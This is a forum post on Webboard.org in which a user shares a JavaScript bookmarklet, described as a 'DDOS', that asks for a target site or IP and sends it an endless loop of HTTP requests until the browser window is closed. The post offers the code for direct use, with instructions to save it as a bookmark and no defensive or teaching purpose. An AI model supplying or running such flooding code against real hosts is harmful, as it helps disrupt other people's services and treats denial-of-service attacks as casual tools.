View previous topic - View next topic |
Author |
Message |
cyberdivision
Posts: 591
|
Posted: 24 Mar 2024 20:06 initial question | |
|
Code: |
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();
|
Save the code as a bookmark to have this feature directly on your browser.
Note: This DDOS only stops if the user close the window.
Note: The machine may run slower until DDOS stop. |
|
Back to top |
|
 |
cyberdivision
Posts: 591
|
|
Back to top |
|
 |
|
|
Set bookmark for this topic
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|
Webboard.org is choosing the fastest connection for you.
server slots: 170/500 |
server load: 12% |
Webboard.org |
server time: 0.11s |
board activity: 3667 |
|